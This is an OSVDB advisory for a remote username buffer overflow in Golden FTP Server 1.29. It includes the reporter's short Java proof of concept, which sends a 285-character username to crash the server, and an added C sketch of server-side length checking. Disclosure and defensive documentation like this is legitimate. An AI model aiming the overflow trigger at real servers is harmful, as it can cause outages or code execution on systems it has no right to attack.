Golden FTP Server Username Remote Overflow

2005-03-02T16:15:07
ID OSVDB:14369
Type osvdb
Reporter Carlos Ulver (carlos.ulver@gmail.com)
Modified 2005-03-02T16:15:07

Description

Vulnerability Description

A remote overflow exists in Golden FTP Server. The Golden FTP Server fails to properly perform bounds checking on user-supplied input, resulting in a buffer overflow. With a specially crafted login request containing more than 284 characters in the Username field, a remote attacker can cause execution of arbitrary code on the system resulting in a loss of integrity.
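The missing check described above, shown from the server side as an added example. This is not Golden FTP Server's code or part of the original advisory. The function name parse_user, the status codes and the 64-byte USER_MAX limit are assumptions made for this sketch.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed policy limit for this sketch; not taken from Golden FTP Server. */
#define USER_MAX 64

enum user_status { USER_OK, USER_NOT_USER_CMD, USER_EMPTY, USER_TOO_LONG };

/*
 * Parse one control-channel line ("USER name\r\n") and copy the username
 * into out (capacity out_cap, NUL included). The length is checked before
 * any byte is copied, so an oversized argument is rejected, not truncated.
 */
enum user_status parse_user(const char *line, char *out, size_t out_cap)
{
    static const char verb[] = "USER";
    size_t i, len;

    if (out_cap == 0) return USER_TOO_LONG;
    out[0] = '\0';

    /* FTP verbs are case-insensitive; a short line stops at its NUL. */
    for (i = 0; i < 4; i++)
        if (toupper((unsigned char)line[i]) != verb[i])
            return USER_NOT_USER_CMD;
    if (line[4] != ' ') return USER_NOT_USER_CMD;

    line += 5;
    len = strcspn(line, "\r\n");          /* argument ends at CR or LF */
    if (len == 0) return USER_EMPTY;
    if (len > USER_MAX || len >= out_cap) return USER_TOO_LONG;

    memcpy(out, line, len);
    out[len] = '\0';
    return USER_OK;
}

int main(void)
{
    char name[USER_MAX + 1], line[293] = "USER ";  /* constructed input */

    memset(line + 5, 'a', 285);                    /* 285-byte username */
    memcpy(line + 290, "\r\n", 3);
    printf("%d\n", parse_user(line, name, sizeof name));
    return 0;
}
```

A server using this pattern would answer a USER_TOO_LONG result with an error reply and leave the session unauthenticated.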

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Manual Testing Notes

/*
 * Carlos Ulver at gmail.com
 * www.debarry2.com.br/carlos
 * 03/01/05
 * Golden Ftp Server 1.29(Freeware Version) Username Remote Buffer Overflow
 * This is only a proof of Concept.
 * This Ftpd was running in windows xp sp1 Portuguese(Brazilian)
 */
import java.net.URL;

public class Pocgftpd {

    public static void main(String[] args) {
        String A = new String();

        // Username: 281 'a' characters followed by 4 'b' characters (285 total)
        for (int i = 0; i < 281; i++) A += 'a';
        for (int i = 0; i < 4; i++) A += 'b';

        try {
            //This 'a' for password means nothing...only to complete: user:pass@host
            URL u = new URL("ftp://" + A + ":a@127.0.0.1");
            u.openStream();
        } catch (Exception E1) {}

    }

}

References:

Vendor URL: http://www.goldenftpserver.com/
Security Tracker: 1013358
Secunia Advisory ID: 15156
Secunia Advisory ID: 23323
Packet Storm: http://packetstormsecurity.org/0503-exploits/goldenFTP192.txt
Other Advisory URL: http://reedarvin.thearvins.com/20050427-01.html
Other Advisory URL: http://retrogod.altervista.org/golden_heap.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-03/0054.html
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0612.html
ISS X-Force ID: 19575
ISS X-Force ID: 20299
Generic Exploit URL: http://www.milw0rm.com/id.php?id=967
FrSIRT Advisory: ADV-2006-4936
CVE-2005-0634
Bugtraq ID: 12704